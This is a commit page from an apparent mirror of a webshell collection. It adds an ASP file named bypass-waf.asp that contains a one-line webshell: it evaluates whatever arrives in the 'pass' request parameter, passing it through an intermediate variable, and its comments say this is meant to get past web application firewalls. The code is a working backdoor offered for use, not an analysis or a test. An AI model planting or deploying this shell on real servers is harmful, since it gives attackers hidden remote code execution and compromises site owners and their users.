mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
add bypass-waf.asp
This commit is contained in:
parent
6eb3ff3f9e
commit
a992550251
1 changed files with 9 additions and 0 deletions
9
asp/bypass-waf.asp
Normal file
9
asp/bypass-waf.asp
Normal file
|
@ -0,0 +1,9 @@
|
|||
|
||||
<%
|
||||
dim x1,x2
|
||||
x1 = request("pass")
|
||||
x2 = x1
|
||||
eval x2
|
||||
%>
|
||||
<!-- yes++ -->
|
||||
<!-- 一句话 pass waf -->
|
Loading…
Reference in a new issue